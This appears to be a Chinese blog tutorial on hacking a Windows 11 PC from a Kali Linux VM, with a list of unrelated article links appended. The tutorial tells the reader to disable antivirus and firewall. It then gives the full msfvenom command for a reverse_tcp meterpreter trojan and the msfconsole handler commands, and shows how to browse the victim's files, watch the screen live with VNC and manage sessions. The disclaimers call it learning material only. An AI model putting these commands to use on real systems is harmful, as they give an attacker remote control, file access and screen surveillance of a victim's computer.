当前位置: 首页 > news >正文

kali系统入侵电脑windows(win11系统)渗透测试,骇入电脑教学

本次渗透测试将使用kali虚拟机(攻击机)对本机(靶机)进行入侵并监控屏幕

声明:本篇仅仅是将本机作为靶机的一次简易渗透测试,实际情况中基本不可能出现如此简单的木马骇入(往往在上传木马时就被防护功能进行查杀了),况且——任何骇入他人设备的操作都是违法行为,因此仅用作经验分享供学习。

一,确认相关设置

①VMware菜单栏中选择【虚拟机(M)】->【设置(S)】->在网络适配器中确认开启NAT模式

  

 ②控制面板中选择【查看网络状态和任务】->【更改设配器设置

->找到VMnet8网卡,右键【属性】->在属性栏中找到【VMware Bridge Protocol】打开桥接模式,使主机和虚拟机能够互连

③按如下步骤关闭【病毒和威胁防护】与【防火墙和网络保护】,这一步是为了保证待会儿我们上传给本机(靶机)的“小木马”不会被这些强力防护阻拦与清除

进行此步操作请确保本机没有被入侵的风险,笔者写本篇的目的仅为提供经验,

如若出现任何损失,概不负责!


 二,创建木马与上传木马

①打开kali虚拟机,打开终端,输入命令【ifconfig】(注意是if不是ip!)查看虚拟机(攻击机)的ip地址

②输入以下命令,生成木马文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.xx.xxx LPORT=9999 -f exe > test.exe

注————

蓝色部分是上一步查看到的虚拟机(攻击机)的ip地址,请自行查询并修改;

紫色部分是用于监听本机(靶机)的端口,任意选择一个不被占用的端口即可;

绿色部分是本次生成的木马文件的名字,任意设置;

(代码块用于快速复制命令:) 

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.xx.xxx LPORT=9999 -f exe > test.exe

出现如下回显说明成功,且在执行命令的工作目录下生成文件,这里我是在桌面目录即【~/Desktop】执行的命令,因此文件直接生成在了桌面上,读者可自行选择目录执行命令

③上传木马到本机(靶机)上,直接采用最直接的拖动法完成上传...

进行这一步时请确保标题一中相关设置的第③步,否则木马文件会被阻拦或清除!


 三,执行命令以监听本机(靶机)

①在kali终端中依次输入以下命令:

msfconsole

use exploit/multi/handler

windows/meterpreter/reverse_tcp

set lhost 192.168.xx.xxx

set lport 9999

exploit

注————

蓝色部分是虚拟机(攻击机)的ip地址,请自行查询并修改;

紫色部分是用于监听本机(靶机)的端口,需要确保和标题二中创建木马时输入的端口相同

 (代码块用于快速复制命令:) 

msfconsole
use exploit/multi/handler
windows/meterpreter/reverse_tcp
set lhost 192.168.xx.xxx
set lport 9999
exploit

②本机(靶机)运行木马文件“上钩”

在上一步中,执行完命令【exploit】后kali将进入连接状态,kali终端显示如下:

此时在本机中运行木马文件即可,运行后kali将成功完成渗透,并进入【meterpreter】状态


四,测试 

①基础浏览

渗透成功后,虚拟机(攻击机)可以实时监控本机(靶机),可以使用Linux基本命令如:【ls】列出本机(靶机)当前目录的文件和文件夹,【cat】命令查看本机(靶机)的文件具体内容...等等,请读者自行摸索测试,可以使用命令【help】获取命令菜单

②实时监控

使用命令【run vnc】将在虚拟机(攻击机)中生成窗口,实时监控本机(靶机)

③退出连接

使用快捷键【Ctrl + Z】将退出对当前靶机的连接,询问是否退出,输入【y】,如下:

④查看已连接设备(即“上钩”靶机)

退出连接状态后,使用命令【sessions】可以列出所有“上钩”靶机,使用命令【sessions -i Id】可以连接指定id的靶机,如"sessions -i 1"将连接Id为1的靶机


尾声

完成测试后记得及时开启【病毒和威胁防护】与【防火墙和网络保护】,防止本机受到病毒或骇客攻击,具体操作见【标题一的第③步】

本篇技术仅用作经验分享,请勿用于任何非法行为!

任何入侵他人设备的操作都是违法行为!

相关文章:

  • diff命令详解
  • PalWorld/幻兽帕鲁Ubuntu 22.04 LTS 一键部署脚本
  • React中使用LazyBuilder实现页面懒加载方法一
  • 头歌C语言结构体
  • 【驱动】TI AM437x(内核调试-07):devmem2直接读写内存、寄存器,devkmem读取内核变量
  • Android 系统启动流程
  • 运维SRE-01 目录结构体系、find
  • Codeforces Round 921 (Div. 2)补题
  • ambari hdp 企业级安装实战
  • C语言之猜凶手
  • 04 Redis之命令(Hash型Value命令+List型Value命令+Set型Value命令+有序集合ZSET型Value命令)
  • MySQL必看表设计经验汇总-上(精华版)
  • Linux之常见的管理命令
  • java日志框架总结(三 、Log4j日志框架)
  • SQL注入-sqli-labs-master第一关
  • 【402天】跃迁之路——程序员高效学习方法论探索系列(实验阶段159-2018.03.14)...
  • bootstrap创建登录注册页面
  • CSS进阶篇--用CSS开启硬件加速来提高网站性能
  • java小心机(3)| 浅析finalize()
  • spring boot 整合mybatis 无法输出sql的问题
  • Three.js 再探 - 写一个跳一跳极简版游戏
  • TypeScript实现数据结构(一)栈,队列,链表
  • Vue.js源码(2):初探List Rendering
  • 初探 Vue 生命周期和钩子函数
  • 从伪并行的 Python 多线程说起
  • 精益 React 学习指南 (Lean React)- 1.5 React 与 DOM
  • 如何编写一个可升级的智能合约
  • 一个JAVA程序员成长之路分享
  • 一个项目push到多个远程Git仓库
  • 这几个编码小技巧将令你 PHP 代码更加简洁
  • - 转 Ext2.0 form使用实例
  • 机器人开始自主学习,是人类福祉,还是定时炸弹? ...
  • ### Error querying database. Cause: com.mysql.jdbc.exceptions.jdbc4.CommunicationsException
  • #FPGA(基础知识)
  • #Linux(make工具和makefile文件以及makefile语法)
  • #LLM入门|Prompt#1.7_文本拓展_Expanding
  • #每日一题合集#牛客JZ23-JZ33
  • #使用清华镜像源 安装/更新 指定版本tensorflow
  • (2)MFC+openGL单文档框架glFrame
  • (Matalb分类预测)GA-BP遗传算法优化BP神经网络的多维分类预测
  • (pt可视化)利用torch的make_grid进行张量可视化
  • (Python) SOAP Web Service (HTTP POST)
  • (分布式缓存)Redis分片集群
  • (附源码)python旅游推荐系统 毕业设计 250623
  • (附源码)ssm跨平台教学系统 毕业设计 280843
  • (十三)Flask之特殊装饰器详解
  • .NET Core/Framework 创建委托以大幅度提高反射调用的性能
  • .NET Core引入性能分析引导优化
  • .NET 应用启用与禁用自动生成绑定重定向 (bindingRedirect),解决不同版本 dll 的依赖问题
  • .Net高阶异常处理第二篇~~ dump进阶之MiniDumpWriter
  • .Net开发笔记(二十)创建一个需要授权的第三方组件
  • .NET与 java通用的3DES加密解密方法
  • @property python知乎_Python3基础之:property
  • [ solr入门 ] - 利用solrJ进行检索
  • [2017][note]基于空间交叉相位调制的两个连续波在few layer铋Bi中的全光switch——